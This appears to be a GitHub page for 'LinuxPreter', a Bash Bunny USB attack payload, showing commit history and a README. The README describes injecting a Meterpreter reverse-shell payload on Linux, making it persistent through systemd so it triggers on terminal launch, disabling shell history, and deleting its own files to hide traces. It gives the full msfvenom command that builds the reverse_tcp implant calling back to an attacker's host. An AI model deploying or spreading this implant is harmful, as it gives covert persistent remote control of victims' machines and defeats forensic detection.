bashbunny-payloads/payloads/library/remote_access/LinuxPreter
drapl0n bd4ec90d04
Changing systemd Unit (#514)
* Uploaded BunnyLogger

* uploading payload intel

* Create README.md

* Update README.md

* uploaded LinuxPreter

* uploaded FileRipper

Faster executing version

* Update README.md

* fixing typo

* uploaded sudoSnatch

* Update README.md

* deleting sudoSnatch

* uploading payload

* Delete payload.sh

* Delete shell

* Delete systemBus

* Delete camPeek directory

* Update payload.sh

* Update payload.sh

* Delete payloads/library/execution/FileRipper directory

* Update payload.sh

* Update payload.sh

* Update payload.sh

* Update payload.sh
2022-04-14 16:09:21 -05:00
..
README.md Uploaded LinuxPreter (#502) 2022-03-12 16:27:24 -06:00
payload.sh Changing systemd Unit (#514) 2022-04-14 16:09:21 -05:00
payload.txt Uploaded LinuxPreter (#502) 2022-03-12 16:27:24 -06:00

README.md

About:

  • Title: LinuxPreter
  • Description: Injects meterpreter payload and makes it persistent.
  • AUTHOR: drapl0n
  • Version: 1.0
  • Category: Remote Access
  • Target: Unix-like operating systems with systemd.
  • Attackmodes: HID, Storage

LinuxPreter injects meterpreter payload, make it persistent and triggers payload on launch of terminal/shell.

Workflow:

  • Keeping tracks clear by preventing storage of history.
  • Fetching BashBunny's block device and mounting it.
  • Transfering payload script and payload itself.
  • Deleting scripts from victims machine and unmounting bunny.

Create Meterpreter payload:

  • msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP ADDRESS> LPORT=<PORT NO> -f elf -o sysHandle.bin
  • NOTE: Only change IP address and Port number in the above command.

LED Status:

  • SETUP : MAGENTA
  • ATTACK : YELLOW
  • FINISH : GREEN

Directory Structure of payload components:

FileName Directory
payload.txt /payload/switch1/
payload.sh /payload/
sysHandle.bin /tools/

Support me if you like my work: